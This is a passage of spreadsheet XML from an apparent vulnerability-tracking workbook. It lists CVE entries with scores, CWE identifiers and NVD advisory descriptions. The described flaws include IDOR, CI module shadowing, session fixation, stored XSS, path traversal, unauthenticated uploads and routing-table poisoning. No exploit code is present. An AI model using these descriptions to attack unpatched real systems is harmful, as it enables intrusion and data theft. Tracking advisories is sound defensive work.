      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>WeGIA is a web manager for charitable institutions. Prior to 3.8.5, WeGIA maps InternoControle to an empty resource array in web/controle/control.php, and verificarPermissao in web/dao/MiddlewareDAO.php treats that empty array as unconditional access for every authenticated user. The methods in web/controle/InternoControle.php, including listarUm, alterar, and excluir, accept user-controlled id or idInterno values without verifying ownership, allowing a low-privileged user to read, modify, or delete another person's records and expose personal, identity, address, medical, and family information. The advisory notes that a self-referencing load bug can crash this controller in the reported revision, but the empty-resource authorization pattern and affected methods remain the vulnerability under review. This issue is fixed in version 3.8.5.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54671</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54916</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-427, CWE-829</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. The absence of tests/init.py and the lack of --import-mode=importlib cause pytest prepend import mode to place the tests directory at the front of sys.path during collection. An unauthenticated contributor can add a module such as tests/git.py that shadows GitPython when tests/definitions_test.py executes from git import Git, Repo, or add tests/conftest.py for automatic collection-time execution. Python imports and runs the pull-request module before any test function, allowing arbitrary code execution on the GitHub Actions runner, test-result tampering, and access to tokens or network resources exposed to the workflow. This module-shadowing path is independent of the earlier pickle deserialization flaw and the separately tracked NETBOX_DT_LIBRARY_URL issue. This vulnerability is fixed by commit b0d9a3dadd0a0a9d3c93b0b2777559fd4bad1037.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54916</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77614</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Opencast is a free, open-source platform to support the management of educational audio and video content. Prior to versions 19.7 and 20.2, the default security configuration in etc/security/mh_default_org.xml accepts a client-selected JSESSIONID from the ;jsessionid= URL path parameter and does not replace it when the victim logs in. An unauthenticated attacker can send a crafted link to a victim whose browser has no active Opencast session cookie, wait for the victim to authenticate, and then reuse the known identifier as the victim's authenticated session. This can expose the victim's data and actions and can produce full administrative account takeover when the victim is an administrator. This issue is fixed in versions 19.7 and 20.2.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77614</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78295</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Xagio SEO &lt;= 7.1.0.43 versions.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78295</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85130</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.4 does not escape a value submitted through a public endpoint for the JavaScript context it is later output in on an administrative screen, allowing unauthenticated users to run arbitrary JavaScript in the session of an administrator who interacts with the logged entry. Only multisite installations are affected.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85130</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86801</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>The To Do List Member WordPress plugin from 1.4 through 1.6 ships a file upload endpoint that does not load WordPress and therefore applies no authentication, capability or nonce check of any kind, and validates only the name of an uploaded file rather than its content, allowing unauthenticated users to store active content served from the site's own origin, and to list and delete the files already staged there.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86801</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87786</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>The Dewa Kirim  WordPress plugin through 1.0.0 does not escape delivery coordinates submitted at checkout before outputting them inside an inline script, allowing unauthenticated users to store JavaScript that runs in the session of an administrator who later opens the order.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87786</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88792</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>The Dictionary WordPress plugin through 1.0 does not have authorisation, sanitisation or escaping in place when adding or updating dictionary entries, allowing unauthenticated users to store arbitrary web scripts which will execute when a user views an affected entry.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88792</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88904</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>The PuppyFW WordPress plugin through 0.4.4 does not have proper authorisation on one of its REST routes, which tests the caller against a capability taken from the request itself, allowing any authenticated user, including subscribers, to add, modify and delete arbitrary blog options and thereby escalate their privileges.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88904</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92918</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 persists user session tokens in the audit log event body when publishing UserLoggedIn domain events. Attackers with log:view permission can read the JSON response from the GET /logs endpoint to harvest session tokens and replay them as bearer credentials for full user access.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92918</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92970</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>HUBzero CMS through 2.2.32 contains a path traversal vulnerability in project file upload handlers that allows authenticated project members to write arbitrary files outside the project repository. Attackers can supply traversal sequences in upload parameters to write files to attacker-chosen paths with web server privileges, potentially enabling code execution.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92970</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92972</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>SGLang through 0.5.19 in prefill/decode disaggregation mode contains an unauthenticated PUT /route endpoint on the prefill bootstrap service that allows attackers to poison the KV transfer routing table. Attackers can supply arbitrary rank_ip and rank_port values to redirect decode workers to attacker-controlled endpoints, causing denial of service or disclosure of KV transfer metadata including session identifiers and tensor-parallel topology parameters.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92972</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52836</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>OpenDDS is an open source C++ implementation of the Object Management Group (OMG) Data Distribution Service (DDS). Prior to 3.34.0, a network attacker can crash a reachable OpenDDS participant by sending a malformed RTPS UDP submessage whose crafted length or sequence-number state causes dds/DCPS/transport/rtps_udp/RtpsUdpReceiveStrategy.cpp in RtpsUdpReceiveStrategy::handle_input() to advance ACE_Message_Block::rd_ptr() beyond valid data. The parser can then call dds/DCPS/transport/rtps_udp/RtpsSampleHeader.cpp in RtpsSampleHeader::init(), which dereferences the invalid read pointer without first validating it against wr_ptr() or ensuring that a complete submessage header remains. The resulting SIGSEGV occurs in the receive thread, terminates the DDS process, and destroys the DDS entities hosted by that participant. No authentication, prior protocol state, or victim interaction is required. This issue is fixed in version 3.34.0.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52836</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54343</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Prior to version 2.52.1, a remote attacker can request a traversal path handled by SCORMRenderer.render in lms/page_renderers.py. The renderer constructs and opens a server-side path without first confirming that its real path remains within public/scorm, allowing files outside the SCORM directory to be read when they are accessible to the server process. This issue is fixed in version 2.52.1.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54343</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54571</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>ESPAsyncWebServer is an asynchronous HTTP and WebSocket server library for ESP32, ESP8266, RP2040 and RP2350. Prior to 3.11.1, the multipart/form-data parser in src/WebRequest.cpp stores _boundaryPosition as an 8-bit value while _parseMultipartPostByte processes the boundary. A remote request containing an exactly 256-byte multipart boundary wraps _boundaryPosition from 255 to zero, prevents the boundary parsing loop from terminating, consumes excessive CPU, and triggers a FreeRTOS watchdog reset on affected ESP32 or ESP8266 devices. This issue is fixed in version 3.11.1.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54571</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63459</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/dashboard</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
